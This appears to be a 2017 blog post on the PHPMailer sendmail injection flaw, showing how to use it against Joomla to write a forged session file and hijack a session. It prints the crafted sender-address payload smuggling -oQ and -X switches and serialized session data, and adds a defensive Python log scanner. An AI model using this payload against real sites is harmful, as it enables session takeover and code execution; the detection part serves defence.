Monday, January 2, 2017

Using the PHPMailer vulnerability to take over a session

At the end of 2016 the world was shaken by a remote code execution exploit for PHPMailer.

It is a very common third-party library, used by Drupal, WordPress, Joomla and a number of other top web projects.

The cause of this vulnerability is incorrect filtering of the email address when it is used as an argument for the sendmail utility, which is executed via the system shell. As a result, a remote attacker can write an arbitrary file by using the -X argument.

The obvious way to exploit this is a web shell upload. However, it depends on two different requirements:
  1. The attacker must know the full path to the web root directory (like /var/www).
  2. The web application must have file system privileges to write into one of the web directories.
We suggest another way to exploit this vulnerability that has neither of these requirements: uploading a session file.

For Joomla the exploit could look like this:
$email_from = '"attacker\" -oQ/tmp/ -X/tmp/sess_f8af03562e674480401098254fe223e0  some"@email.com';
$msg_body  = 'joomla|s:1572:"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";';

Then set the value f8af03562e674480401098254fe223e0 as the session cookie and take the profit :)
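The address shape used above (a quoted local part that smuggles sendmail switches through whitespace) is easy to recognise at the application boundary and in form-submission logs. The following is an added detection example written for this post, not code from PHPMailer or Joomla; the strict address pattern, the log format and the log lines are constructed assumptions.

```python
import re

# Conservative local-part@domain form: no whitespace, quotes or shell metacharacters.
# Assumption: a deliberately strict subset of RFC 5321, not PHPMailer's own validator.
STRICT_ADDRESS = re.compile(r"^[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}$")

# The option-smuggling shape from this post: whitespace followed by a sendmail
# switch (-oQ queue directory, -X log file) inside a quoted local part.
SENDMAIL_SWITCH = re.compile(r"\s-(?:X|oQ)\S*")

# Constructed form-submission log: one benign sender, the injection from this post,
# and a quoted-but-harmless address that a strict policy still refuses.
SAMPLE_LOG = """\
2017-01-02T09:58:12Z 198.51.100.7 contact-form from=alice@example.com
2017-01-02T09:58:40Z 203.0.113.9 contact-form from="attacker\\" -oQ/tmp/ -X/tmp/sess_f8af03562e674480401098254fe223e0  some"@email.com
2017-01-02T09:59:03Z 198.51.100.7 contact-form from="John Doe"@example.com
"""


def classify_sender(addr: str) -> str:
    """Return 'injection' if sendmail switches are smuggled in, 'reject' if the
    address does not meet the strict form, otherwise 'ok'."""
    if SENDMAIL_SWITCH.search(addr):
        return "injection"
    if not STRICT_ADDRESS.match(addr):
        return "reject"
    return "ok"


def scan_log(text: str) -> list:
    """Return (line_no, verdict, address) for every log entry that is not 'ok'."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        if " from=" not in line:
            continue  # not a form-submission record
        addr = line.split(" from=", 1)[1]
        verdict = classify_sender(addr)
        if verdict != "ok":
            findings.append((line_no, verdict, addr))
    return findings


if __name__ == "__main__":
    for line_no, verdict, addr in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {verdict}: {addr}")
```

Rejecting anything outside the strict form before the address reaches a shell command line is the mitigation; the switch pattern is only a detection aid for reviewing past submissions.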

Moreover, in the Joomla case there is also serialized data inside this base64 body:
O:24:"Joomla\Registry\Registry":3:{s:7:"*data";O:8:"stdClass":1:{s:9:"__default";O:8:"stdClass":3:{s:7:"session";O:8:"stdClass":3:{s:7:"counter";i:8;s:5:"timer";O:8:"stdClass":3:{s:5:"start";i:1483388063;s:4:"last";i:1483388136;s:3:"now";i:1483388365;}s:5:"token";s:32:"nZlydWX1Cx3Ugn8QmcK7DgDbMNFA1Qdy";}s:8:"registry";O:24:"Joomla\Registry\Registry":3:{s:7:"*data";O:8:"stdClass":0:{}s:14:"*initialized";b:1;s:9:"separator";s:1:".";}s:5:"setup";O:8:"stdClass":2:{s:7:"helpurl";s:74:"https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}";s:7:"options";a:15:{s:9:"site_name";s:14:"russia-related";s:11:"admin_email";s:12:"asd@asds.com";s:10:"admin_user";s:5:"admin";s:14:"admin_password";s:28:"russia-relatedrussia-related";s:13:"site_metadesc";s:0:"";s:12:"site_offline";i:0;s:8:"language";s:5:"en-US";s:7:"helpurl";s:74:"https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}";s:7:"db_type";s:6:"mysqli";s:7:"db_host";s:9:"127.0.0.1";s:7:"db_user";s:4:"root";s:7:"db_pass";s:12:"my-secret-pw";s:7:"db_name";s:4:"test";s:6:"db_old";s:6:"backup";s:9:"db_prefix";s:6:"pkc6q_";}}}}s:14:"*initialized";b:0;s:9:"separator";s:1:".";}

So the attacker could also escalate this to RCE.